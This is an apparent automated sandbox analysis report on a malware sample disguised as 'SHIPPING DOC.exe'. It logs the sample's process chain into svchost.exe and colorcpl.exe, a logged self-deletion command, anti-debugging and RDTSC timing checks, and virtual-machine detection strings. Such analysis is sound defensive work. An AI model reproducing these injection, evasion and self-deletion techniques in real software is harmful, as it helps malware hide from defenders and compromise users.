          Source: C:\Users\user\Desktop\SHIPPING DOC.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SHIPPING DOC.exe"
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SHIPPING DOC.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"Jump to behavior
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wscinterop.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wscapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: werconcpl.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: framedynos.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wer.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: hcproviders.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: colorui.dllJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: mscms.dllJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: coloradapterclient.dllJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: SHIPPING DOC.exeStatic file information: File size 1096093 > 1048576
          Source: Binary string: colorcpl.pdbGCTL source: svchost.exe, 00000006.00000003.1424656875.0000000003030000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1424638942.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1425923732.0000000003980000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000003.1424418407.000000000301C000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000002.3705450747.0000000000C40000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: colorcpl.pdb source: svchost.exe, 00000006.00000003.1424656875.0000000003030000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1424638942.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1425923732.0000000003980000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000003.1424418407.000000000301C000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 0000000B.00000002.3705450747.0000000000C40000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: SHIPPING DOC.exe, 00000000.00000003.1270711708.0000000004060000.00000004.00001000.00020000.00000000.sdmp, SHIPPING DOC.exe, 00000000.00000003.1271552278.0000000004200000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1425398449.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1272920309.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1271421810.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1425398449.000000000379E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000003.1425469673.0000000004402000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000002.3705970501.0000000004760000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000003.1428133757.00000000045B1000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000002.3705970501.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: SHIPPING DOC.exe, 00000000.00000003.1270711708.0000000004060000.00000004.00001000.00020000.00000000.sdmp, SHIPPING DOC.exe, 00000000.00000003.1271552278.0000000004200000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000006.00000002.1425398449.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1272920309.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1271421810.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1425398449.000000000379E000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 0000000B.00000003.1425469673.0000000004402000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000002.3705970501.0000000004760000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000003.1428133757.00000000045B1000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000B.00000002.3705970501.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000008.00000002.3724965131.00000000112BF000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 0000000B.00000002.3706706512.0000000004CAF000.00000004.10000000.00040000.00000000.sdmp, colorcpl.exe, 0000000B.00000002.3704373694.0000000000900000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000008.00000002.3724965131.00000000112BF000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 0000000B.00000002.3706706512.0000000004CAF000.00000004.10000000.00040000.00000000.sdmp, colorcpl.exe, 0000000B.00000002.3704373694.0000000000900000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
          Source: SHIPPING DOC.exeStatic PE information: real checksum: 0xa961f should be: 0x113be0
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0041285C push cs; retf 6_2_0041285F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00417008 pushfd ; retf 6_2_0041700F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004171EF push ds; iretd 6_2_004171FD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0041E992 push dword ptr [08CCB4BEh]; ret 6_2_0041E9AA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0041E9B2 push dword ptr [0ECCDC24h]; ret 6_2_0041EACE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00416A81 pushfd ; retf 6_2_00416A82
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00417ABC push edi; ret 6_2_00417ABD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0040E46D push ebx; retf 6_2_0040E470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0041D475 push eax; ret 6_2_0041D4C8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0041D4C2 push eax; ret 6_2_0041D4C8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0041D4CB push eax; ret 6_2_0041D532
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0041D52C push eax; ret 6_2_0041D532
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0041E530 push edi; ret 6_2_0041E532
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004177BF push B417C20Bh; ret 6_2_004177C4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0360225F pushad ; ret 6_2_036027F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036027FA pushad ; ret 6_2_036027F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036309AD push ecx; mov dword ptr [esp], ecx6_2_036309B6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0360283D push eax; iretd 6_2_03602858
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0360135F push eax; iretd 6_2_03601369
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03B4EB1E push esp; retn 0000h6_2_03B4EB1F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03B4EB02 push esp; retn 0000h6_2_03B4EB03
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03B4E9B5 push esp; retn 0000h6_2_03B4EAE7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_054EE9B5 push esp; retn 0000h6_2_054EEAE7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_054EEB02 push esp; retn 0000h6_2_054EEB03
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_054EEB1E push esp; retn 0000h6_2_054EEB1F
          Source: C:\Windows\explorer.exeCode function: 8_2_09447B02 push esp; retn 0000h8_2_09447B03
          Source: C:\Windows\explorer.exeCode function: 8_2_09447B1E push esp; retn 0000h8_2_09447B1F
          Source: C:\Windows\explorer.exeCode function: 8_2_094479B5 push esp; retn 0000h8_2_09447AE7
          Source: C:\Windows\explorer.exeCode function: 8_2_1093F9B5 push esp; retn 0000h8_2_1093FAE7
          Source: C:\Windows\explorer.exeCode function: 8_2_1093FB1E push esp; retn 0000h8_2_1093FB1F
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeAPI/Special instruction interceptor: Address: 3CF23E4
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFB2CED0774
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFB2CECD8A4
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
          Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
          Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FFB2CED0774
          Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
          Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
          Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
          Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
          Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
          Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FFB2CECD8A4
          Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 519904 second address: 51990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 519B6E second address: 519B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00409AA0 rdtsc 6_2_00409AA0
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 9485Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 463Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 877Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 867Jump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeWindow / User API: threadDelayed 9842Jump to behavior
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeAPI coverage: 3.5 %
          Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 2.4 %
          Source: C:\Windows\SysWOW64\colorcpl.exeAPI coverage: 2.2 %
          Source: C:\Windows\explorer.exe TID: 8136Thread sleep count: 9485 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 8136Thread sleep time: -18970000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 8136Thread sleep count: 463 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 8136Thread sleep time: -926000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exe TID: 8100Thread sleep count: 129 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exe TID: 8100Thread sleep time: -258000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exe TID: 8100Thread sleep count: 9842 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exe TID: 8100Thread sleep time: -19684000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
          Source: explorer.exe, 00000008.00000002.3704102761.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000I
          Source: explorer.exe, 00000008.00000003.3078312376.000000000325F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
          Source: explorer.exe, 00000008.00000003.3077610962.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000008.00000000.1280533641.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077610962.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3713048612.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271408637.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000008.00000003.3078312376.000000000325F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
          Source: explorer.exe, 00000008.00000003.3078312376.000000000325F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
          Source: explorer.exe, 00000008.00000000.1280533641.0000000009013000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000008.00000003.3078312376.000000000325F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000008.00000002.3709405422.0000000007315000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_xU1
          Source: explorer.exe, 00000008.00000003.3077610962.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: explorer.exe, 00000008.00000000.1280533641.0000000009052000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000}io
          Source: explorer.exe, 00000008.00000003.2271408637.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000I}~"
          Source: explorer.exe, 00000008.00000003.2271408637.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000008.00000003.2271408637.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1280533641.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3713048612.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077610962.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\machine.inf_loc5
          Source: explorer.exe, 00000008.00000003.3078312376.000000000325F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware20,1
          Source: explorer.exe, 00000008.00000003.3078312376.000000000325F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
          Source: explorer.exe, 00000008.00000003.3077610962.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMWare
          Source: explorer.exe, 00000008.00000000.1280533641.0000000009052000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000'
          Source: explorer.exe, 00000008.00000002.3709405422.0000000007315000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: explorer.exe, 00000008.00000002.3713048612.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271408637.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1280533641.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077610962.0000000008F27000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWT`
          Source: explorer.exe, 00000008.00000003.3078312376.000000000325F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIES1371
          Source: explorer.exe, 00000008.00000003.3078312376.000000000325F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
          Source: explorer.exe, 00000008.00000003.3078312376.000000000325F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
          Source: explorer.exe, 00000008.00000002.3704102761.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000008.00000003.3077610962.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000002.3704102761.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeAPI call chain: ExitProcess graph end nodegraph_0-87143
          Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00409AA0 rdtsc 6_2_00409AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0040ACE0 LdrLoadDll,6_2_0040ACE0
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_03CF26B0 mov eax, dword ptr fs:[00000030h]0_2_03CF26B0
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_03CF2650 mov eax, dword ptr fs:[00000030h]0_2_03CF2650
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_03CF0FF0 mov eax, dword ptr fs:[00000030h]0_2_03CF0FF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036D437C mov eax, dword ptr fs:[00000030h]6_2_036D437C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B2349 mov eax, dword ptr fs:[00000030h]6_2_036B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B2349 mov eax, dword ptr fs:[00000030h]6_2_036B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B2349 mov eax, dword ptr fs:[00000030h]6_2_036B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B2349 mov eax, dword ptr fs:[00000030h]6_2_036B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B2349 mov eax, dword ptr fs:[00000030h]6_2_036B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B2349 mov eax, dword ptr fs:[00000030h]6_2_036B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B2349 mov eax, dword ptr fs:[00000030h]6_2_036B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B2349 mov eax, dword ptr fs:[00000030h]6_2_036B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B2349 mov eax, dword ptr fs:[00000030h]6_2_036B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B2349 mov eax, dword ptr fs:[00000030h]6_2_036B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B2349 mov eax, dword ptr fs:[00000030h]6_2_036B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B2349 mov eax, dword ptr fs:[00000030h]6_2_036B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B2349 mov eax, dword ptr fs:[00000030h]6_2_036B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B2349 mov eax, dword ptr fs:[00000030h]6_2_036B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B2349 mov eax, dword ptr fs:[00000030h]6_2_036B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_036B035C mov eax, dword ptr fs:[00000030h]6_2_036B035C
